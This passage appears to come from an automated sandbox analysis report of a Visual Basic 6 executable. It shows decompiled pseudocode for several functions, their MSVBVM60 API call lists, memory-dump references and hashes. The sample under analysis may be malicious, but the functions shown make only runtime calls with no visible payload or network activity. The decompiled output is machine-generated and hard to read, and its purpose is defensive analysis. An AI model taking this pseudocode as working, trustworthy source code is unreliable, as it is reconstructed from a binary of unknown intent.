					_push(_v60);
					_push( &_v76);
					L00401424();
					_push(1);
					_t67 =  &_v76;
					_push(_t67);
					L00401418();
					L0040141E();
					_push(_t67);
					L004013A6();
					L0040140C();
					_push( &_v60);
					_t57 =  &_v56;
					_push(_t57);
					_push(2);
					L00401406();
					L0040143C();
				}
				_push(0x41126e);
				L0040143C();
				L0040140C();
				return _t57;
			}


























                              0x004110c9
                              0x004110d8
                              0x004110e2
                              0x004110ea
                              0x004110ed
                              0x004110f4
                              0x00411103
                              0x0041110c
                              0x00411117
                              0x0041111f
                              0x00411122
                              0x0041112f
                              0x00411134
                              0x00411137
                              0x00411138
                              0x00411148
                              0x0041114f
                              0x00411154
                              0x0041115a
                              0x00411167
                              0x00411181
                              0x00411169
                              0x00411169
                              0x0041116e
                              0x00411173
                              0x00411178
                              0x00411178
                              0x0041119c
                              0x004111a0
                              0x004111a5
                              0x004111b4
                              0x004111ba
                              0x004111bc
                              0x004111c3
                              0x004111df
                              0x004111c5
                              0x004111c5
                              0x004111ca
                              0x004111cf
                              0x004111d2
                              0x004111d5
                              0x004111da
                              0x004111da
                              0x004111e3
                              0x004111e5
                              0x004111e7
                              0x004111ed
                              0x004111ee
                              0x004111f6
                              0x004111f8
                              0x004111fb
                              0x004111fc
                              0x00411206
                              0x0041120b
                              0x0041120c
                              0x00411214
                              0x0041121c
                              0x0041121d
                              0x00411220
                              0x00411221
                              0x00411223
                              0x0041122e
                              0x0041122e
                              0x00411233
                              0x00411260
                              0x00411268
                              0x0041126d

                              APIs
                              • __vbaChkstk.MSVBVM60(?,004012E6), ref: 004110E2
                              • __vbaVarDup.MSVBVM60(?,?,?,?,004012E6), ref: 0041110C
                              • __vbaStrCopy.MSVBVM60(?,?,?,?,004012E6), ref: 00411117
                              • __vbaVarDup.MSVBVM60 ref: 0041112F
                              • #562.MSVBVM60(?), ref: 00411138
                              • __vbaFreeVar.MSVBVM60(?), ref: 0041114F
                              • __vbaNew2.MSVBVM60(00402B88,00413010,?), ref: 00411173
                              • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?), ref: 004111A0
                              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AEC,00000130,?,?,?,?,?), ref: 004111D5
                              • __vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000,?,?,?,?,?), ref: 004111EE
                              • __vbaStrVarMove.MSVBVM60(?,00000001,?,?,?,004012E6), ref: 004111FC
                              • __vbaStrMove.MSVBVM60(?,00000001,?,?,?,004012E6), ref: 00411206
                              • #580.MSVBVM60(00000000,?,00000001,?,?,?,004012E6), ref: 0041120C
                              • __vbaFreeStr.MSVBVM60(00000000,?,00000001,?,?,?,004012E6), ref: 00411214
                              • __vbaFreeObjList.MSVBVM60(00000002,?,?,00000000,?,00000001,?,?,?,004012E6), ref: 00411223
                              • __vbaFreeVar.MSVBVM60(00000000,?,00000001,?,?,?,004012E6), ref: 0041122E
                              • __vbaFreeVar.MSVBVM60(0041126E,?), ref: 00411260
                              • __vbaFreeStr.MSVBVM60(0041126E,?), ref: 00411268
                              Memory Dump Source
                              • Source File: 00000000.00000002.272820152.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.272812236.0000000000400000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.272832673.0000000000413000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.272851001.0000000000415000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: __vba$Free$Move$#562#580CallCheckChkstkCopyHresultLateListNew2
                              • String ID:
                              • API String ID: 2788452748-0
                              • Opcode ID: 216120de3e7730767565a385055e9ca8448b15add3cc950e2fdbeee00e584bdc
                              • Instruction ID: cb4b5ad6d046b73ef40cf38cdf902e3814efa46fe068123c3ecf78b3f2d36549
                              • Opcode Fuzzy Hash: 216120de3e7730767565a385055e9ca8448b15add3cc950e2fdbeee00e584bdc
                              • Instruction Fuzzy Hash: D741E875D00209ABCB01EFE1C896BDDBBB8AF08704F50416AF505BB1B1DB789A46CB59
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00411733, Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 67COMMON
                              Download Yara Rule
                              C-Code - Quality: 75%
                              			E00411733(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a8, void* _a24, void* _a60) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v40;
				void* _v56;
				intOrPtr _v60;
				char _v64;
				void* _v88;
				char _v104;
				char* _v128;
				char _v136;
				intOrPtr _v144;
				char _v152;
				short _v156;
				short _t40;
				short _t41;
				void* _t58;
				void* _t60;
				intOrPtr _t61;

				_t61 = _t60 - 0xc;
				 *[fs:0x0] = _t61;
				L004012E0();
				_v16 = _t61;
				_v12 = 0x4012a8;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4012e6, _t58);
				L00401412();
				L00401412();
				L00401412();
				L004013EE();
				_v128 =  &_v64;
				_v136 = 0x4008;
				_push(1);
				_push( &_v136);
				_push( &_v104);
				L0040138E();
				_v144 = 0x403c24;
				_v152 = 0x8008;
				_push( &_v104);
				_t40 =  &_v152;
				_push(_t40);
				L00401394();
				_v156 = _t40;
				L0040143C();
				_t41 = _v156;
				if(_t41 != 0) {
					_push(0x98);
					L00401388();
					_v60 = _t41;
				}
				_push(0x41184b);
				L0040143C();
				L0040143C();
				L0040140C();
				L0040143C();
				return _t41;
			}






















                              0x00411736
                              0x00411745
                              0x00411751
                              0x00411759
                              0x0041175c
                              0x00411763
                              0x00411772
                              0x0041177b
                              0x00411786
                              0x00411791
                              0x0041179e
                              0x004117a6
                              0x004117a9
                              0x004117b3
                              0x004117bb
                              0x004117bf
                              0x004117c0
                              0x004117c5
                              0x004117cf
                              0x004117dc
                              0x004117dd
                              0x004117e3
                              0x004117e4
                              0x004117e9
                              0x004117f3
                              0x004117f8
                              0x00411801
                              0x00411803
                              0x00411808
                              0x0041180d
                              0x0041180d
                              0x00411810
                              0x0041182d
                              0x00411835
                              0x0041183d
                              0x00411845
                              0x0041184a

                              APIs
                              • __vbaChkstk.MSVBVM60(?,004012E6), ref: 00411751
                              • __vbaVarDup.MSVBVM60(?,?,?,?,004012E6), ref: 0041177B
                              • __vbaVarDup.MSVBVM60(?,?,?,?,004012E6), ref: 00411786
                              • __vbaVarDup.MSVBVM60(?,?,?,?,004012E6), ref: 00411791
                              • __vbaStrCopy.MSVBVM60(?,?,?,?,004012E6), ref: 0041179E
                              • #619.MSVBVM60(?,00004008,00000001), ref: 004117C0
                              • __vbaVarTstNe.MSVBVM60(?,?,?,00004008,00000001), ref: 004117E4
                              • __vbaFreeVar.MSVBVM60(?,?,?,00004008,00000001), ref: 004117F3
                              • #568.MSVBVM60(00000098,?,?,?,00004008,00000001), ref: 00411808
                              • __vbaFreeVar.MSVBVM60(0041184B,?,?,?,00004008,00000001), ref: 0041182D
                              • __vbaFreeVar.MSVBVM60(0041184B,?,?,?,00004008,00000001), ref: 00411835
                              • __vbaFreeStr.MSVBVM60(0041184B,?,?,?,00004008,00000001), ref: 0041183D
                              • __vbaFreeVar.MSVBVM60(0041184B,?,?,?,00004008,00000001), ref: 00411845
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.272820152.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.272812236.0000000000400000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.272832673.0000000000413000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.272851001.0000000000415000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: __vba$Free$#568#619ChkstkCopy
                              • String ID: ABC
                              • API String ID: 718684173-2743272264
                              • Opcode ID: 78bef3722923daf758526954c5b5812bb10c028c1a7f821455bafb6f25e4bdcc
                              • Instruction ID: bc1363b6417dbd7443313a72d80900a5d2fd03fb9b8a54ea9a87c8173ed9b9d7
                              • Opcode Fuzzy Hash: 78bef3722923daf758526954c5b5812bb10c028c1a7f821455bafb6f25e4bdcc
                              • Instruction Fuzzy Hash: C821EC71900208ABDB14EFA1C982BDDB7B8BF04704F5084BAB505B71B1EB786B49CF59
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00410E65, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 94COMMON
                              Download Yara Rule
                              C-Code - Quality: 43%
                              			E00410E65(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v24;
				char _v28;
				intOrPtr _v36;
				char _v44;
				char _v60;
				char _v80;
				intOrPtr* _v84;
				signed int _v88;
				char _v96;
				signed int _v100;
				char* _t41;
				intOrPtr _t48;
				char* _t49;
				char* _t52;
				signed int _t55;
				intOrPtr _t65;

				_push(0x4012e6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t65;
				_push(0x50);
				L004012E0();
				_v12 = _t65;
				_v8 = 0x401228;
				_v36 = 0x80020004;
				_v44 = 0xa;
				_push(0);
				_push(0xffffffff);
				_push( &_v44);
				_push(0x403bec);
				_push( &_v60);
				L004013BE();
				_t41 =  &_v60;
				_push(_t41);
				_push(0x2008);
				L004013C4();
				_v80 = _t41;
				_push( &_v80);
				_push( &_v24);
				L004013CA();
				_push( &_v60);
				_push( &_v44);
				_push(2);
				L00401400();
				_t48 =  *((intOrPtr*)(_v24 + 0xc));
				_push( *((intOrPtr*)(_t48 + (0 -  *((intOrPtr*)(_v24 + 0x14))) * 4)));
				_push(0x403bf8);
				L004013B8();
				if(_t48 != 0) {
					if( *0x413744 != 0) {
						_v96 = 0x413744;
					} else {
						_push(0x413744);
						_push(0x403bd8);
						L0040142A();
						_v96 = 0x413744;
					}
					_t21 =  &_v96; // 0x413744
					_v84 =  *((intOrPtr*)( *_t21));
					_t52 =  &_v28;
					L00401460();
					_t55 =  *((intOrPtr*)( *_v84 + 0x10))(_v84, _t52, _t52, _a4);
					asm("fclex");
					_v88 = _t55;
					if(_v88 >= 0) {
						_v100 = _v100 & 0x00000000;
					} else {
						_push(0x10);
						_push(0x403bc8);
						_push(_v84);
						_push(_v88);
						L0040145A();
						_v100 = _t55;
					}
					L0040144E();
				}
				_push(0x410fa9);
				_t49 =  &_v24;
				_push(_t49);
				_push(0);
				L004013B2();
				return _t49;
			}





















                              0x00410e6a
                              0x00410e75
                              0x00410e76
                              0x00410e7d
                              0x00410e80
                              0x00410e88
                              0x00410e8b
                              0x00410e92
                              0x00410e99
                              0x00410ea0
                              0x00410ea2
                              0x00410ea7
                              0x00410ea8
                              0x00410eb0
                              0x00410eb1
                              0x00410eb6
                              0x00410eb9
                              0x00410eba
                              0x00410ebf
                              0x00410ec4
                              0x00410eca
                              0x00410ece
                              0x00410ecf
                              0x00410ed7
                              0x00410edb
                              0x00410edc
                              0x00410ede
                              0x00410ef1
                              0x00410ef4
                              0x00410ef7
                              0x00410efc
                              0x00410f03
                              0x00410f0c
                              0x00410f26
                              0x00410f0e
                              0x00410f0e
                              0x00410f13
                              0x00410f18
                              0x00410f1d
                              0x00410f1d
                              0x00410f2d
                              0x00410f32
                              0x00410f38
                              0x00410f3c
                              0x00410f4a
                              0x00410f4d
                              0x00410f4f
                              0x00410f56
                              0x00410f6f
                              0x00410f58
                              0x00410f58
                              0x00410f5a
                              0x00410f5f
                              0x00410f62
                              0x00410f65
                              0x00410f6a
                              0x00410f6a
                              0x00410f76
                              0x00410f76
                              0x00410f7b
                              0x00410f9d
                              0x00410fa0
                              0x00410fa1
                              0x00410fa3
                              0x00410fa8

                              APIs
                              • __vbaChkstk.MSVBVM60(?,004012E6), ref: 00410E80
                              • #711.MSVBVM60(?,00403BEC,0000000A,000000FF,00000000,?,?,?,?,?,?,?,004012E6), ref: 00410EB1
                              • __vbaAryVar.MSVBVM60(00002008,?,?,00403BEC,0000000A,000000FF,00000000,?,?,?,?,?,?,?,004012E6), ref: 00410EBF
                              • __vbaAryCopy.MSVBVM60(?,?,00002008,?,?,00403BEC,0000000A,000000FF,00000000), ref: 00410ECF
                              • __vbaFreeVarList.MSVBVM60(00000002,0000000A,?,?,?,00002008,?,?,00403BEC,0000000A,000000FF,00000000), ref: 00410EDE
                              • __vbaStrCmp.MSVBVM60(00403BF8,?), ref: 00410EFC
                              • __vbaNew2.MSVBVM60(00403BD8,00413744,00403BF8,?), ref: 00410F18
                              • __vbaObjSetAddref.MSVBVM60(?,?), ref: 00410F3C
                              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403BC8,00000010), ref: 00410F65
                              • __vbaFreeObj.MSVBVM60(00000000,?,00403BC8,00000010), ref: 00410F76
                              • __vbaAryDestruct.MSVBVM60(00000000,00403BF8,00410FA9,00403BF8,?), ref: 00410FA3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.272820152.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.272812236.0000000000400000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.272832673.0000000000413000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.272851001.0000000000415000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: __vba$Free$#711AddrefCheckChkstkCopyDestructHresultListNew2
                              • String ID: D7A
                              • API String ID: 4246334928-420359484
                              • Opcode ID: ef7a26433b93ca6eaeda6adfc93d6c29d27ef23660465b0d11a42b361ed82b0a
                              • Instruction ID: 0d71f93def158223c23566c29f0eb4b3c6c74fadfda552c0739a4d5cde64c635
                              • Opcode Fuzzy Hash: ef7a26433b93ca6eaeda6adfc93d6c29d27ef23660465b0d11a42b361ed82b0a
                              • Instruction Fuzzy Hash: 9C31EDB1900208AFDB10EFD5C846FDEBBB8EB08705F10412AF511BB1E1D7B8A585CB29
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00411340, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 70COMMON
                              Download Yara Rule
                              C-Code - Quality: 70%
                              			E00411340(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				void* _v44;
				signed int _v48;
				intOrPtr* _v52;
				signed int _v56;
				intOrPtr _v68;
				char _v72;
				signed int _v76;
				signed int _t36;
				signed int _t42;
				void* _t52;
				void* _t54;
				intOrPtr _t55;

				_t55 = _t54 - 0xc;
				 *[fs:0x0] = _t55;
				L004012E0();
				_v16 = _t55;
				_v12 = 0x401268;
				_v8 = 0;
				_t36 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x34,  *[fs:0x0], 0x4012e6, _t52);
				L00401412();
				_push(0x403c00);
				L0040139A();
				if(_t36 != 1) {
					if( *0x413744 != 0) {
						_v72 = 0x413744;
					} else {
						_push(0x413744);
						_push(0x403bd8);
						L0040142A();
						_v72 = 0x413744;
					}
					_t11 =  &_v72; // 0x413744
					_v52 =  *((intOrPtr*)( *_t11));
					_t42 =  *((intOrPtr*)( *_v52 + 0x48))(_v52, 0x6f,  &_v48);
					asm("fclex");
					_v56 = _t42;
					if(_v56 >= 0) {
						_v76 = _v76 & 0x00000000;
					} else {
						_push(0x48);
						_push(0x403bc8);
						_push(_v52);
						_push(_v56);
						L0040145A();
						_v76 = _t42;
					}
					_t36 = _v48;
					_v68 = _t36;
					_v48 = _v48 & 0x00000000;
					L0040141E();
				}
				_push(0x411438);
				L0040140C();
				L0040143C();
				return _t36;
			}



















                              0x00411343
                              0x00411352
                              0x0041135c
                              0x00411364
                              0x00411367
                              0x0041136e
                              0x0041137d
                              0x00411386
                              0x0041138b
                              0x00411390
                              0x00411399
                              0x004113a2
                              0x004113bc
                              0x004113a4
                              0x004113a4
                              0x004113a9
                              0x004113ae
                              0x004113b3
                              0x004113b3
                              0x004113c3
                              0x004113c8
                              0x004113d9
                              0x004113dc
                              0x004113de
                              0x004113e5
                              0x004113fe
                              0x004113e7
                              0x004113e7
                              0x004113e9
                              0x004113ee
                              0x004113f1
                              0x004113f4
                              0x004113f9
                              0x004113f9
                              0x00411402
                              0x00411405
                              0x00411408
                              0x00411412
                              0x00411412
                              0x00411417
                              0x0041142a
                              0x00411432
                              0x00411437

                              APIs
                              • __vbaChkstk.MSVBVM60(?,004012E6), ref: 0041135C
                              • __vbaVarDup.MSVBVM60(?,?,?,?,004012E6), ref: 00411386
                              • __vbaI2Str.MSVBVM60(00403C00,?,?,?,?,004012E6), ref: 00411390
                              • __vbaNew2.MSVBVM60(00403BD8,00413744,00403C00,?,?,?,?,004012E6), ref: 004113AE
                              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403BC8,00000048), ref: 004113F4
                              • __vbaStrMove.MSVBVM60(00000000,?,00403BC8,00000048), ref: 00411412
                              • __vbaFreeStr.MSVBVM60(00411438,00403C00,?,?,?,?,004012E6), ref: 0041142A
                              • __vbaFreeVar.MSVBVM60(00411438,00403C00,?,?,?,?,004012E6), ref: 00411432
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.272820152.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.272812236.0000000000400000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.272832673.0000000000413000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.272851001.0000000000415000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: __vba$Free$CheckChkstkHresultMoveNew2
                              • String ID: D7A
                              • API String ID: 640110359-420359484
                              • Opcode ID: 53cdfaed6b546231020aa55c81ab954a00285f2808327daaf539f4cd24fa8762
                              • Instruction ID: c5f3f2fa0562a2d5427d8196f38bdcc9e59b36882e774b1547fedc01bcbdab73
                              • Opcode Fuzzy Hash: 53cdfaed6b546231020aa55c81ab954a00285f2808327daaf539f4cd24fa8762
                              • Instruction Fuzzy Hash: 01210870900209EFDB10EF95C986BDDBBB4EF04B05F10802AF501B72E1D7786A86CB59
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0040E4B4, Relevance: 15.1, APIs: 10, Instructions: 102COMMON
                              Download Yara Rule
                              C-Code - Quality: 54%
                              			E0040E4B4(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				intOrPtr _v44;
				intOrPtr _v52;
				intOrPtr _v60;
				intOrPtr _v68;
				char _v72;
				signed int _v76;
				signed int _v84;
				signed int _v88;
				signed int _t50;
				signed int _t62;
				void* _t67;
				void* _t74;
				intOrPtr _t76;

				_t67 = __edx;
				 *[fs:0x0] = _t76;
				L004012E0();
				_v12 = _t76;
				_v8 = 0x401118;
				L00401460();
				_t50 =  *((intOrPtr*)( *_a4 + 0x58))(_a4,  &_v72,  &_v24, _a4, __edi, __esi, __ebx, 0x44,  *[fs:0x0], 0x4012e6, __ecx, __ecx, _t74);
				asm("fclex");
				_v76 = _t50;
				if(_v76 >= 0) {
					_v84 = _v84 & 0x00000000;
				} else {
					_push(0x58);
					_push(0x4038f8);
					_push(_a4);
					_push(_v76);
					L0040145A();
					_v84 = _t50;
				}
				_v32 = _v72;
				L00401460();
				L00401454();
				_v28 = E00411B99( &_v36);
				L0040144E();
				_v32 = E00411B99(_v28) + 0x2b0;
				E00411B3F(_t67, _v32, _a8);
				_v60 = 0x80020004;
				_v68 = 0xa;
				_v44 = 0x80020004;
				_v52 = 0xa;
				L004012E0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L004012E0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t62 =  *((intOrPtr*)( *_a4 + 0x2b0))(_a4, 0x10, 0x10,  &_v36,  &_v36, _a4);
				asm("fclex");
				_v76 = _t62;
				if(_v76 >= 0) {
					_v88 = _v88 & 0x00000000;
				} else {
					_push(0x2b0);
					_push(0x4038f8);
					_push(_a4);
					_push(_v76);
					L0040145A();
					_v88 = _t62;
				}
				_push(0x40e5f7);
				L0040144E();
				return _t62;
			}






















                              0x0040e4b4
                              0x0040e4c5
                              0x0040e4cf
                              0x0040e4d7
                              0x0040e4da
                              0x0040e4e8
                              0x0040e4f9
                              0x0040e4fc
                              0x0040e4fe
                              0x0040e505
                              0x0040e51e
                              0x0040e507
                              0x0040e507
                              0x0040e509
                              0x0040e50e
                              0x0040e511
                              0x0040e514
                              0x0040e519
                              0x0040e519
                              0x0040e525
                              0x0040e52f
                              0x0040e538
                              0x0040e543
                              0x0040e549
                              0x0040e55b
                              0x0040e564
                              0x0040e569
                              0x0040e570
                              0x0040e577
                              0x0040e57e
                              0x0040e588
                              0x0040e592
                              0x0040e593
                              0x0040e594
                              0x0040e595
                              0x0040e599
                              0x0040e5a3
                              0x0040e5a4
                              0x0040e5a5
                              0x0040e5a6
                              0x0040e5af
                              0x0040e5b5
                              0x0040e5b7
                              0x0040e5be
                              0x0040e5da
                              0x0040e5c0
                              0x0040e5c0
                              0x0040e5c5
                              0x0040e5ca
                              0x0040e5cd
                              0x0040e5d0
                              0x0040e5d5
                              0x0040e5d5
                              0x0040e5de
                              0x0040e5f1
                              0x0040e5f6

                              APIs
                              • __vbaChkstk.MSVBVM60(?,004012E6), ref: 0040E4CF
                              • __vbaObjSetAddref.MSVBVM60(?,?,?,?,?,?,004012E6), ref: 0040E4E8
                              • __vbaHresultCheckObj.MSVBVM60(00000000,?,004038F8,00000058), ref: 0040E514
                              • __vbaObjSetAddref.MSVBVM60(?,?), ref: 0040E52F
                              • #644.MSVBVM60(?,?,?), ref: 0040E538
                              • __vbaFreeObj.MSVBVM60(00000000,?,?,?), ref: 0040E549
                              • __vbaChkstk.MSVBVM60(?,?,?,00000000,?,?,?), ref: 0040E588
                              • __vbaChkstk.MSVBVM60(?,?,?,00000000,?,?,?), ref: 0040E599
                              • __vbaHresultCheckObj.MSVBVM60(00000000,?,004038F8,000002B0), ref: 0040E5D0
                              • __vbaFreeObj.MSVBVM60(0040E5F7), ref: 0040E5F1
                              Memory Dump Source
                              • Source File: 00000000.00000002.272820152.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.272812236.0000000000400000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.272832673.0000000000413000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.272851001.0000000000415000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: __vba$Chkstk$AddrefCheckFreeHresult$#644
                              • String ID:
                              • API String ID: 1032928638-0
                              • Opcode ID: 08134899319e25310501c8985a5fdf747a53ee5378dbce3ceb8aec7e44028ffe
                              • Instruction ID: dec0eb478f38230ae8ecc65d7eef75ee575132c7731c51c532d7a5b397566d83
                              • Opcode Fuzzy Hash: 08134899319e25310501c8985a5fdf747a53ee5378dbce3ceb8aec7e44028ffe
                              • Instruction Fuzzy Hash: 4C41F5B1900208AFDF01EFD1CC46B9EBBB5FF04349F10442AF501BB1A1D7B999569B58
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004115F6, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 78COMMON
                              Download Yara Rule
                              C-Code - Quality: 57%
                              			E004115F6(void* __ebx, void* __edi, void* __esi, void* _a36, signed int* _a52) {
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				short _v32;
				void* _v52;
				void* _v56;
				intOrPtr* _v60;
				signed int _v64;
				intOrPtr* _v68;
				signed int _v72;
				char _v84;
				signed int _v88;
				signed int _v92;
				signed int _t46;
				signed int _t51;
				short _t52;
				void* _t62;
				intOrPtr _t63;

				_t63 = _t62 - 0xc;
				_push(0x4012e6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t63;
				_push(0x44);
				L004012E0();
				_v16 = _t63;
				_v12 = 0x401298;
				L004013EE();
				 *_a52 =  *_a52 & 0x00000000;
				if( *0x413744 != 0) {
					_v84 = 0x413744;
				} else {
					_push(0x413744);
					_push(0x403bd8);
					L0040142A();
					_v84 = 0x413744;
				}
				_t8 =  &_v84; // 0x413744
				_v60 =  *((intOrPtr*)( *_t8));
				_t46 =  *((intOrPtr*)( *_v60 + 0x14))(_v60,  &_v52);
				asm("fclex");
				_v64 = _t46;
				if(_v64 >= 0) {
					_v88 = _v88 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x403bc8);
					_push(_v60);
					_push(_v64);
					L0040145A();
					_v88 = _t46;
				}
				_v68 = _v52;
				_t51 =  *((intOrPtr*)( *_v68 + 0x118))(_v68,  &_v56);
				asm("fclex");
				_v72 = _t51;
				if(_v72 >= 0) {
					_v92 = _v92 & 0x00000000;
				} else {
					_push(0x118);
					_push(0x403c04);
					_push(_v68);
					_push(_v72);
					L0040145A();
					_v92 = _t51;
				}
				_t52 = _v56;
				_v32 = _t52;
				L0040144E();
				_push(0x411716);
				L0040140C();
				return _t52;
			}





















                              0x004115f9
                              0x004115fc
                              0x00411607
                              0x00411608
                              0x0041160f
                              0x00411612
                              0x0041161a
                              0x0041161d
                              0x0041162a
                              0x00411632
                              0x0041163c
                              0x00411656
                              0x0041163e
                              0x0041163e
                              0x00411643
                              0x00411648
                              0x0041164d
                              0x0041164d
                              0x0041165d
                              0x00411662
                              0x00411671
                              0x00411674
                              0x00411676
                              0x0041167d
                              0x00411696
                              0x0041167f
                              0x0041167f
                              0x00411681
                              0x00411686
                              0x00411689
                              0x0041168c
                              0x00411691
                              0x00411691
                              0x0041169d
                              0x004116ac
                              0x004116b2
                              0x004116b4
                              0x004116bb
                              0x004116d7
                              0x004116bd
                              0x004116bd
                              0x004116c2
                              0x004116c7
                              0x004116ca
                              0x004116cd
                              0x004116d2
                              0x004116d2
                              0x004116db
                              0x004116df
                              0x004116e6
                              0x004116eb
                              0x00411710
                              0x00411715

                              APIs
                              • __vbaChkstk.MSVBVM60(?,004012E6), ref: 00411612
                              • __vbaStrCopy.MSVBVM60(?,?,?,?,004012E6), ref: 0041162A
                              • __vbaNew2.MSVBVM60(00403BD8,00413744,?,?,?,?,004012E6), ref: 00411648
                              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403BC8,00000014), ref: 0041168C
                              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C04,00000118), ref: 004116CD
                              • __vbaFreeObj.MSVBVM60 ref: 004116E6
                              • __vbaFreeStr.MSVBVM60(00411716), ref: 00411710
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.272820152.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.272812236.0000000000400000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.272832673.0000000000413000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.272851001.0000000000415000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: __vba$CheckFreeHresult$ChkstkCopyNew2
                              • String ID: D7A
                              • API String ID: 746201682-420359484
                              • Opcode ID: aa002aedcdd89bdc3a0ae1c9aa2c177727fa0347720edbbc52497f1b97e54828
                              • Instruction ID: 55bcda01f090fc8395e95b52cf8b2ad765f1c94fff8d67035ba7166f41b055bf
                              • Opcode Fuzzy Hash: aa002aedcdd89bdc3a0ae1c9aa2c177727fa0347720edbbc52497f1b97e54828
                              • Instruction Fuzzy Hash: AA31D274900208EFCB00EFD5D985BEDBBB4BF0470AF10402AF211BB2A1D7796986DB59
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00410D83, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMON
                              Download Yara Rule
                              C-Code - Quality: 51%
                              			E00410D83(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v32;
				intOrPtr* _v36;
				signed int _v40;
				intOrPtr* _v48;
				signed int _v52;
				signed int _t21;
				char* _t24;
				intOrPtr _t34;

				_push(0x4012e6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t34;
				_t21 = 0x20;
				L004012E0();
				_v12 = _t34;
				_v8 = 0x401218;
				_push(0);
				_push(1);
				_push(2);
				L004013D0();
				if(_t21 != 0x102) {
					if( *0x413744 != 0) {
						_v48 = 0x413744;
					} else {
						_push(0x413744);
						_push(0x403bd8);
						L0040142A();
						_v48 = 0x413744;
					}
					_v36 =  *_v48;
					_t24 =  &_v32;
					L00401460();
					_t21 =  *((intOrPtr*)( *_v36 + 0x10))(_v36, _t24, _t24, _a4);
					asm("fclex");
					_v40 = _t21;
					if(_v40 >= 0) {
						_v52 = _v52 & 0x00000000;
					} else {
						_push(0x10);
						_push(0x403bc8);
						_push(_v36);
						_push(_v40);
						L0040145A();
						_v52 = _t21;
					}
					L0040144E();
				}
				asm("wait");
				_push(0x410e4a);
				return _t21;
			}













                              0x00410d88
                              0x00410d93
                              0x00410d94
                              0x00410d9d
                              0x00410d9e
                              0x00410da6
                              0x00410da9
                              0x00410db0
                              0x00410db2
                              0x00410db4
                              0x00410db6
                              0x00410dc0
                              0x00410dc9
                              0x00410de3
                              0x00410dcb
                              0x00410dcb
                              0x00410dd0
                              0x00410dd5
                              0x00410dda
                              0x00410dda
                              0x00410def
                              0x00410df5
                              0x00410df9
                              0x00410e07
                              0x00410e0a
                              0x00410e0c
                              0x00410e13
                              0x00410e2c
                              0x00410e15
                              0x00410e15
                              0x00410e17
                              0x00410e1c
                              0x00410e1f
                              0x00410e22
                              0x00410e27
                              0x00410e27
                              0x00410e33
                              0x00410e33
                              0x00410e38
                              0x00410e39
                              0x00000000

                              APIs
